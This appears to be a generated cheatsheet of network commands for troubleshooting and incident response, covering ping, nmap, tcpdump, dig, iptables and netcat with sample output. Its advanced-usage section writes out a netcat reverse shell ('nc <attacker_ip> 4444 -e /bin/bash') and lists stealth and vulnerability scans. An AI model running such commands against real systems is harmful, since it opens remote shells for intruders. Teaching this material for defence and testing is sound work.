Network Security Incident Response
Category: Network Troubleshooting
Type: Network Tools & Commands
Generated on: 2025-07-11 01:39:49
For: Network Engineering, Administration & Technical Interviews
This cheatsheet provides a practical guide to network tools and commands for incident response, focusing on network troubleshooting and security investigations.
1. Tool Overview:
| Tool | Description | Use Cases |
|---|---|---|
ping | Tests network connectivity to a host. | Basic connectivity testing, latency measurement. |
traceroute / tracert | Maps the path packets take to a destination. | Identifying network bottlenecks, routing issues, geolocation. |
netstat / ss | Displays active network connections, listening ports, and routing tables. | Identifying malicious connections, port scanning, service discovery. |
tcpdump / Wireshark | Captures and analyzes network traffic. | Packet analysis, protocol decoding, identifying suspicious traffic. |
nmap | Network mapper; scans ports and identifies services. | Network discovery, vulnerability assessment, identifying open ports. |
dig / nslookup | DNS lookup tools. | DNS resolution troubleshooting, verifying DNS records, identifying DNS servers. |
arp | Displays and modifies the Address Resolution Protocol (ARP) cache. | Identifying MAC addresses associated with IP addresses, detecting ARP spoofing. |
iptables / firewalld / Windows Firewall | Configures firewall rules. | Blocking malicious traffic, limiting access to services. |
route | Displays and modifies the routing table. | Troubleshooting routing issues, adding static routes. |
whois | Retrieves domain registration information. | Identifying domain owners, geolocation, abuse reporting. |
curl / wget | Transfers data from or to a server. | Testing web server connectivity, downloading files, accessing APIs. |
netcat (nc) | Reads and writes data across network connections. | Port scanning, creating reverse shells, testing network services. |
2. Basic Syntax:
ping:ping [options] <hostname or IP>traceroute:traceroute [options] <hostname or IP>(Linux/macOS),tracert <hostname or IP>(Windows)netstat:netstat [options](Deprecated, usesson Linux)ss:ss [options]tcpdump:tcpdump [options] <filter expression>nmap:nmap [options] <target(s)>dig:dig [options] <hostname> <query type>nslookup:nslookup <hostname>arp:arp [options] <IP address>iptables:iptables [options] <chain> <rule>(Linux)firewalld:firewall-cmd [options](Linux)route:route [options](Linux/macOS),route print(Windows)whois:whois <domain>curl:curl [options] <URL>wget:wget [options] <URL>netcat (nc):nc [options] <hostname> <port>
3. Practical Examples:
-
ping:Terminal window ping google.comPING google.com (142.250.184.142) 56(84) bytes of data.64 bytes from fra16s54-in-f14.1e100.net (142.250.184.142): icmp_seq=1 ttl=117 time=7.59 ms64 bytes from fra16s54-in-f14.1e100.net (142.250.184.142): icmp_seq=2 ttl=117 time=7.57 ms -
traceroute/tracert:Terminal window traceroute google.comtraceroute to google.com (142.250.184.142), 30 hops max, 60 byte packets1 192.168.1.1 (192.168.1.1) 1.021 ms 1.112 ms 1.158 ms2 10.0.0.1 (10.0.0.1) 3.234 ms 3.278 ms 3.319 ms3 ...Terminal window tracert google.com -
netstat/ss:Terminal window netstat -ant | grep :80Terminal window ss -ant | grep :80tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTENtcp 0 0 192.168.1.100:443 172.217.160.142:443 ESTABLISHED -
tcpdump:Terminal window tcpdump -i eth0 -n port 80tcpdump: verbose output suppressed, use -v or -vv for full protocol decodelistening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes14:32:12.123456 IP 192.168.1.100.50000 > 172.217.160.142.80: Flags [S], seq 1234567890, win 65535, options [mss 1460,nop,wscale 7,nop,nop,TS val 123456789,TS ecr 0,sackOK,eol], length 0 -
nmap:Terminal window nmap -sV 192.168.1.100Starting Nmap 7.80 ( https://nmap.org ) at 2023-10-27 14:33 EDTNmap scan report for 192.168.1.100Host is up (0.00026s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p0 Ubuntu 7ubuntu2 (protocol 2.0)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu)) -
dig:Terminal window dig google.com; <<>> DiG 9.11.5-P4-5.1+deb10u2 <<>> google.com;; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12345;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 512;; QUESTION SECTION:;google.com. IN A;; ANSWER SECTION:google.com. 299 IN A 142.250.184.142;; Query time: 3 msec;; SERVER: 192.168.1.1#53(192.168.1.1);; WHEN: Fri Oct 27 14:34:00 EDT 2023;; MSG SIZE rcvd: 55 -
arp:Terminal window arp -a? (192.168.1.1) at 00:11:22:33:44:55 [ether] on eth0? (192.168.1.100) at aa:bb:cc:dd:ee:ff [ether] on eth0 -
iptables:Terminal window iptables -A INPUT -s 192.168.1.10 -j DROP(Drops all traffic from 192.168.1.10 – USE WITH CAUTION!)
-
route:Terminal window route -nKernel IP routing tableDestination Gateway Genmask Flags Metric Ref Use Iface0.0.0.0 192.168.1.1 0.0.0.0 UG 100 0 0 eth0192.168.1.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0 -
whois:Terminal window whois google.com -
curl:Terminal window curl -I google.comHTTP/2 200date: Fri, 27 Oct 2023 18:35:00 GMTexpires: -1cache-control: private, max-age=0content-type: text/html; charset=ISO-8859-1server: gws... -
wget:Terminal window wget https://example.com/file.txt -
netcat (nc):Terminal window nc -zv google.com 80Connection to google.com 80 port [tcp/http] succeeded!
4. Common Options:
ping:-c <count>: Send only specified number of ECHO_REQUEST packets.-t <ttl>: Set the IP Time to Live. Higher TTL can bypass some firewalls.
traceroute/tracert:-m <max_hops>: Specify the maximum number of hops.-I: Use ICMP for probes (traceroute).
netstat/ss:-a: Show all sockets (listening and non-listening).-n: Show numerical addresses instead of resolving hostnames.-t: Show TCP connections.-u: Show UDP connections.-p: Show the PID and name of the program to which each socket belongs. (Requires root privileges)ss -lntu: List all listening TCP/UDP ports numerically.
tcpdump:-i <interface>: Specify the network interface to listen on (e.g.,eth0,wlan0).-n: Don’t resolve hostnames.-nn: Don’t resolve hostnames or port names.-v/-vv/-vvv: Increase verbosity.-w <file>: Write the raw packets to a file for later analysis.-r <file>: Read packets from a file.-s <snaplen>: Specify the snapshot length (amount of data to capture for each packet).-s 0captures the entire packet.
nmap:-sS: TCP SYN scan (stealth scan).-sT: TCP connect scan (requires a full TCP connection).-sU: UDP scan.-sV: Version detection.-p <port(s)>: Specify port(s) to scan. e.g.,-p 80,443,22or-p 1-1000.-O: OS detection.-A: Aggressive scan (enables OS detection, version detection, script scanning, and traceroute).-T<0-5>: Timing template (0=paranoid, 1=sneaky, 2=polite, 3=normal, 4=aggressive, 5=insane).--script <script(s)>: Run NSE scripts. e.g.,--script http-enum
dig:+trace: Trace the DNS resolution path.<query type>: Specify the DNS record type (e.g.,A,MX,TXT,NS).
nslookup:server <dns server>: Specify the DNS server to use.
arp:-n: Show numerical addresses.-d <IP address>: Delete an ARP entry. (Requires root privileges)-s <IP address> <MAC address>: Manually add an ARP entry. (Requires root privileges)
iptables/firewalld:-A <chain>: Append a rule to the specified chain (e.g.,INPUT,OUTPUT,FORWARD).-I <chain> <rule number>: Insert a rule at the specified position in the chain.-D <chain> <rule number>: Delete a rule.-L <chain>: List rules in the specified chain.-j <target>: Specify the target for a rule (e.g.,ACCEPT,DROP,REJECT).-s <source>: Specify the source IP address or network.-d <destination>: Specify the destination IP address or network.-p <protocol>: Specify the protocol (e.g.,tcp,udp,icmp).--dport <port>: Specify the destination port.--sport <port>: Specify the source port.
route:-n: Display numerical addresses.add default gw <gateway IP>: Add a default gateway. (Requires root privileges)add -net <network/mask> gw <gateway IP>: Add a route to a specific network. (Requires root privileges)del default gw <gateway IP>: Delete the default gateway. (Requires root privileges)
curl/wget:-I: Show only the HTTP headers.-O: Save the downloaded file with the same name as the remote file.-o <filename>: Save the downloaded file with a specified name.-A <user-agent>: Set the User-Agent header.
netcat (nc):-l: Listen for incoming connections.-p <port>: Specify the port to listen on or connect to.-v: Verbose mode.-z: Zero-I/O mode (used for port scanning).-n: Numeric-only IP addresses, no DNS lookup-e <program>: Execute a program after connection. (SECURITY RISK! AVOID IN PRODUCTION)
5. Advanced Usage:
-
tcpdumpwith BPF (Berkeley Packet Filter):Terminal window tcpdump -i eth0 'tcp port 80 and host 192.168.1.100' -w http_traffic.pcap(Captures all TCP traffic on port 80 to/from 192.168.1.100 and saves it to
http_traffic.pcap) -
nmapNSE (Nmap Scripting Engine):Terminal window nmap --script vuln 192.168.1.100(Runs vulnerability scanning scripts against 192.168.1.100)
-
netcatReverse Shell (Example - DO NOT USE ON UNTRUSTED NETWORKS):Attacker (listening):
Terminal window nc -lvnp 4444Victim (compromised machine):
Terminal window nc <attacker_ip> 4444 -e /bin/bash(EXTREMELY DANGEROUS! ONLY USE IN CONTROLLED TESTING ENVIRONMENTS!)
-
Combining tools with pipes:
Terminal window ss -ant | grep ESTABLISHED | awk '{print $5}' | cut -d':' -f1 | sort | uniq -c | sort -nr | head -n 10(Lists the top 10 most frequent remote IP addresses connected to the system via TCP.)
6. Troubleshooting Scenarios:
| Scenario | Tools/Commands | Steps | Expected Output/Action |
|---|---|---|---|
| Cannot reach a website | ping, traceroute, dig, curl, nslookup | 1. ping the website to check basic connectivity. 2. traceroute to identify the point of failure. 3. dig or nslookup to check DNS resolution. 4. curl -I to check HTTP status. | 1. “Destination Host Unreachable” indicates a network issue. 2. Identify the last reachable hop. 3. Verify that the website’s IP address is resolving correctly. 4. 200 OK indicates the server is responding. |
| Slow network performance | ping, traceroute, tcpdump, netstat, ss | 1. ping to check latency. 2. traceroute to identify slow hops. 3. tcpdump to capture and analyze traffic for bottlenecks. 4. netstat or ss to identify high connection counts. | 1. High ping times indicate network congestion. 2. Identify routers with high latency. 3. Look for excessive retransmissions or large packets. 4. Identify services with a large number of established connections. |
| Suspicious network activity | netstat, ss, tcpdump, nmap, iptables | 1. netstat or ss to identify suspicious connections. 2. tcpdump to capture and analyze traffic from/to suspicious IPs. 3. nmap to scan suspicious hosts. 4. iptables to block malicious traffic. | 1. Identify connections to unknown or malicious IP addresses. 2. Analyze traffic for malware signatures or unusual protocols. 3. Identify open ports and running services. 4. Block traffic from known malicious sources. |
| DNS resolution issues | dig, nslookup | 1. dig or nslookup the domain. 2. Check the DNS server being used. 3. Try a different DNS server (e.g., 8.8.8.8). | 1. “Server can’t find domain: NXDOMAIN” indicates a DNS problem. 2. Verify the DNS server is functioning correctly. 3. If a different DNS server works, the problem is with the original DNS server. |
| ARP spoofing | arp, tcpdump | 1. arp -a to examine the ARP cache. 2. tcpdump to capture ARP traffic. | 1. Look for multiple IP addresses associated with the same MAC address. 2. Analyze ARP requests and responses for suspicious activity. |
7. Output Interpretation:
ping:time=value indicates round-trip time (latency).TTL=indicates Time To Live (decreases with each hop).traceroute: Shows the path packets take, with latency for each hop.* * *indicates a dropped packet.netstat/ss:LISTENindicates a service is listening for connections.ESTABLISHEDindicates an active connection.TIME_WAITindicates a connection that has been closed but is still waiting for packets.tcpdump: Analyze the captured packets using Wireshark ortcpdump -r <file>with filters. Look for suspicious protocols, source/destination IPs, and flags.nmap:openindicates a port is listening for connections.filteredindicates a port is blocked by a firewall.closedindicates a port is not listening.dig: TheANSWER SECTIONcontains the resolved IP address(es) for the domain.arp: Shows the mapping between IP addresses and MAC addresses.
8. Security Considerations:
nmap: Aggressive scans can be detected by intrusion detection systems (IDS). Use timing templates carefully.tcpdump: Capturing sensitive data (e.g., passwords) is possible. Store capture files securely.iptables/firewalld: Incorrectly configured firewall rules can block legitimate traffic. Test changes carefully. Always have a way to revert changes.netcat:-eoption is a major security risk. Avoid using it. Netcat can be used to create backdoors. Monitor for unauthorized use.- General: Always use the principle of least privilege. Run network tools with the minimum necessary privileges. Monitor network traffic for suspicious activity. Keep your systems patched and up-to-date. Securely store any captured network data.
9. Platform Differences:
traceroute: The command istracerouteon Linux/macOS andtracerton Windows.netstat: Deprecated on Linux; usessinstead.- Firewall: Linux uses
iptablesorfirewalld, Windows usesWindows Firewall. macOS usespfctl. arp: Syntax and options may vary slightly between platforms.- Pathnames: File paths are different (e.g.,
/bin/bashon Linux vs.C:\Windows\System32\cmd.exeon Windows).
This cheatsheet provides a foundation for network security incident response and troubleshooting. Remember to adapt these tools and techniques to your specific environment and security policies. Always prioritize safety and security when using these commands.